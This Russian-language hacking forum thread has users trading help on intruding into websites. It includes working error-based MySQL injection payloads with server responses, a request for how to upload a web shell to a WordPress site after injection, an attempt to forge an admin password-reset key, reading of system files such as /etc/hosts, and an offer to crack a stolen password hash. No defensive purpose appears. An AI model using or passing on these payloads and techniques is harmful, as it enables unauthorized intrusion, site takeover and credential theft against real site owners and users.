Старый 25.05.2016, 14:02   #3541
Molofya
 
Регистрация: 09.07.2015
Сообщений: 21
Репутация: -1
По умолчанию

Цитата:
Сообщение от slv Посмотреть сообщение
Пытаюсь сбрутить директории сайта с помощью Dirbuster (tor service через SOCKS). Не находятся даже те пути, которые точно есть. nikto.pl также выдаёт сообщение о том, что на хосте нет web-сервера (tor через proxychains). Цель использует 4 ip-адреса (виртуальный хостинг, большая площадка). Burpsuite и firefox работают корректно. Никто с таким не сталкивался?
Такое происходит, если сайт отдаёт и валидную страницу, и отсутствующую единым заголовком 200 OK, тогда все эти сканнеры бессильны.
Вариант решения проблемы - написание своего сканнера, который будет определять валид от 404 по признакам в HTML коде.
Molofya вне форума   Ответить с цитированием
Старый 25.05.2016, 14:17   #3542
slv
 
Регистрация: 09.01.2015
Сообщений: 3
Репутация: 0
По умолчанию

Цитата:
Сообщение от Molofya Посмотреть сообщение
Такое происходит, если сайт отдаёт и валидную страницу, и отсутствующую единым заголовком 200 OK, тогда все эти сканнеры бессильны.
Вариант решения проблемы - написание своего сканнера, который будет определять валид от 404 по признакам в HTML коде.
Обычно, в таких случаях сканеры выдают кучу ложных срабатываний. И решается это заданием regexp невалидного респонса (в Dirbuster точно), а у меня наоборот, нет срабатываний вообще.
slv вне форума   Ответить с цитированием
Старый 27.05.2016, 00:13   #3543
Molofya
 
Регистрация: 09.07.2015
Сообщений: 21
Репутация: -1
По умолчанию

Чем можно заменить фильтрующуюся точку при раскрутке SQL иньекта?
Пример:
Цитата:
' AND extractvalue(1,concat(0x3b,(select(count(*))from(t able.user)))) AND '
Вылетает ошибка, если вместо table.user юзать что угодно без точки, tableuser то появится обычное сообщение мускуля о несуществующей таблице.
Есть ли выходы? Если да, подскажите векторы. Sqlmap также справиться не может.
Molofya вне форума   Ответить с цитированием
Старый 01.06.2016, 03:17   #3544
kacergei
 
Регистрация: 17.02.2013
Сообщений: 12
Репутация: 0
По умолчанию

Подскажите раскрутил sql-inj
Вывода ошибок нет, в бд писать не могу
Стоит рядом WordPress без модулей
Вопрос как залить шел?

Неужели имея все данные с БД wp_user нельзя сделать новый пароль?
Прав на запись нет, но попробовал сбросить пароль администратора думал достаточно подставить user_activation_key с бд в url и создать новый пароль администратора
Оказывается $key генерируется неким образом с совокупности данных с БД, может есть какой то скрипт сгенерировать данный $key подставив данные с бд
Или еще какие нибудь варианты?

Так же могу читать файлы но не могу найти путь с соседней темы уже перепробовал
как узнать путь? Выкачал /etc/hosts, /etc/mysql/my.conf, но в них ничего не нашел(
ОС Ubuntu, nginx php
kacergei вне форума   Ответить с цитированием
Старый 01.06.2016, 14:15   #3545
AiR0
 
Регистрация: 23.09.2013
Сообщений: 37
Репутация: 0
По умолчанию

Цитата:
Сообщение от kacergei Посмотреть сообщение
Подскажите раскрутил sql-inj
Вывода ошибок нет, в бд писать не могу
Стоит рядом WordPress без модулей
Вопрос как залить шел?

Неужели имея все данные с БД wp_user нельзя сделать новый пароль?
Прав на запись нет, но попробовал сбросить пароль администратора думал достаточно подставить user_activation_key с бд в url и создать новый пароль администратора
Оказывается $key генерируется неким образом с совокупности данных с БД, может есть какой то скрипт сгенерировать данный $key подставив данные с бд
Или еще какие нибудь варианты?

Так же могу читать файлы но не могу найти путь с соседней темы уже перепробовал
как узнать путь? Выкачал /etc/hosts, /etc/mysql/my.conf, но в них ничего не нашел(
ОС Ubuntu, nginx php
Смотри recently_edited, там может быть полный путь
Кинь wp hash, прогоню по своим словарям
AiR0 вне форума   Ответить с цитированием
Старый 01.06.2016, 17:27   #3546
kacergei
 
Регистрация: 17.02.2013
Сообщений: 12
Репутация: 0
По умолчанию

Цитата:
Сообщение от AiR0 Посмотреть сообщение
Смотри recently_edited, там может быть полный путь
Кинь wp hash, прогоню по своим словарям
Скинул, а так не у кого нет идей или может есть готовый скрипт для генерирования $key в WP исходя из входящих данных?
kacergei вне форума   Ответить с цитированием
Старый 01.06.2016, 17:59   #3547
nomad
 
Аватар для nomad
 
Регистрация: 23.07.2010
Сообщений: 179
Репутация: 7
По умолчанию

Есть инъекция error based + file_priv у текущего юзера.
Запрос
Код:
+and+(select+1+from+(select+count(0), concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)
вывод версию, все ок. Не могу реализовать запись в файл.
Что пробовал:
Код:
+and+(select+1+from+(select+count(0), concat((select+'test' into outfile '/tmp/vs'),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)
Ответ
Код:
SELECT * FROM table_name WHERE id=91005 and (select 1 from (select count(0), concat((select 'test' into outfile '/tmp/vs'),floor(rand(0)*2)) from information_schema.tables group by 2)a) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'into outfile '/tmp/vs'),floor(rand(0)*2)) from information_schema.tables group b' at line 1
Захексил подзапрос:
Код:
+and+(select+1+from+(select+count(0), concat((select+0x27746573742720696e746f206f757466696c6520272f746d702f767327),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)
Получил
Код:
SELECT * FROM table_name WHERE id=91005 and (select 1 from (select count(0), concat((select 0x27746573742720696e746f206f757466696c6520272f746d702f767327),floor(rand(0)*2)) from information_schema.tables group by 2)a) Duplicate entry ''test' into outfile '/tmp/vs'1' for key 'group_key'
Помогите с запросом на запись файла.
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica

Последний раз редактировалось nomad; 01.06.2016 в 19:05..
nomad вне форума   Ответить с цитированием
Старый 01.06.2016, 18:03   #3548
profexer
 
Регистрация: 06.01.2011
Сообщений: 117
Репутация: 63
По умолчанию

Ошибка не запишется в файл. Тебе нужно сделать просто union с выводом в файл, без вызова ошибки.
То есть подбери количество столбцов, добавь свои данные и сделай вывод в файл. Никакого сообщения ты не увидишь (оно тебе и не нужно), но файл будет создан.

Последний раз редактировалось profexer; 01.06.2016 в 18:06..
profexer вне форума   Ответить с цитированием
Старый 01.06.2016, 19:15   #3549
nomad
 
Аватар для nomad
 
Регистрация: 23.07.2010
Сообщений: 179
Репутация: 7
По умолчанию

Я вот не понимаю: судя по ответу - обычный sql запрос без всяких подзапросов и прочих извратов.
SELECT * FROM table_name WHERE id=91005
Через order by подбираю количество стобцов - один (Unknown column '2' in 'order clause')
Но при самом обычном union select 1 получаю The used SELECT statements have a different number of columns
А запрос вида order+by+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50--+ возвращает Unknown column '49' in 'order clause'
Т.е. таки подзапросы?
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica

Последний раз редактировалось nomad; 01.06.2016 в 19:35..
nomad вне форума   Ответить с цитированием
Старый 01.06.2016, 20:22   #3550
profexer
 
Регистрация: 06.01.2011
Сообщений: 117
Репутация: 63
По умолчанию

Подзапрос или переменная попадает в два отдельных запроса.
profexer вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot